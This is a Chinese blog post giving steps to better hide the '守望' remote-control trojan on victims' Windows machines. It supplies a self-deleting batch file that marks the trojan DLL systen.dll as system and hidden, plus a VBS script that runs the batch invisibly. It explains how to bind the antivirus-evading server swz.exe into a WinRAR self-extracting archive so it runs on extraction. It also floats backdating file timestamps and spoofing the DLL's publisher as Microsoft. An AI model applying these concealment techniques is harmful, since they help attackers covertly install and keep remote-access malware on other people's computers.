看了 cracker的“守望者使用技巧收集帖”,忽然想起怎么来加强守望的隐蔽性的问题,因为老大没有在生成服务端的时候修改服务端的生成时间和属性,故这个需要我们自己来做,当然我不知道systen.dll的生成时间是否能修改,但是属性是一定可以的。今天就说说怎么把systen.dll的属性设置为系统和隐藏,这个代码cracker已经说了,就是attrib +s +h %windir%\system32\systendll,我主要说说具体实现和一些改进。
1,用记事本建立一个文件,输入
@echo off
attrib +s +h %windir%\system32\systen.dll
del %windir%\system32\hide.vbs
del %windir%\system32\hide.bat
另存为hide.bat
这个东东的作用就是修改守望属性为系统和隐藏,
说明:%windir%\system32\是你的自解压路径,个人是不同的,自行修改
2,用记事本建立一个文件,输入
set Cleaner=createobject(“wscript.shell”)
Cleaner.run “hide.bat”,vbhide
另存为hide.vbs
这个东东的作用就是可以隐藏批处理的界面
3,准备你的免杀守望swz.exe,利用“最近的星球 ”写的动画“WINRAR捆绑动画版–用工具的!不是手工”来做一个捆绑.
参数为:解压后运行hide.vbs,解压前运行swz.exe。罗唆一句的是利用winrar补丁来消除右键“解压到”选项时,事先不能修改用winrar压缩的exe。
这样是不是很好玩呢?对于高手就作用不大了,如果能修改systen.dll的时间属性,那隐蔽性可就更高了。
说说缺点,这个方法的最大的缺点就是服务端增大了2倍多,我69k的服务端一下子增长到161k,而这也没办法压缩。可以在制作好的exe的资源上打主意,因为winrar的那些东西我们不需要,只要它执行我们的程序,以后再说吧。。。。。。
昨晚突然有个新的想法,可惜最近太忙,没时间做。
就是写个批处,先修改系统时间为较早时间,从批处调用执行守望,然后修改dll的系统和隐藏属性,删除批处。这样就可以修改dll的建立时间和隐藏属性。
至于减小体积,那是有办法地。
其实这个功能最好是老大在程序里做,我看到过有的服务端就有这种功能,是个国外的远控。不知道守望能不能增加这个功能?
还有了个想法,如果能把替换服务的dll的发行者设置为Microsoft corporation , 描述就也修改,还伪装个微软的版本号.这些我们在配置服务端的时候可以让我们自己选择,那伪装的dll可就真不容易找了.
今天特意测试了下,守望的dll发行者没有,描述没有,版本号没有,在模块里边很显眼,如能加强一下伪装,呵呵,那就更隐蔽
金刀客博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明说说加强守望主程序的隐蔽性!
![[原创文章]WDCP v3网站开启伪静态及转换.htaccess为nginx伪静态文件conf的方法](https://www.daokers.com/wp-content/themes/Git-finally/timthumb.php?src=https://www.daokers.com/wp-content/uploads/2017/07/2017070315201367.jpg&h=110&w=185&q=90&zc=1&ct=1)
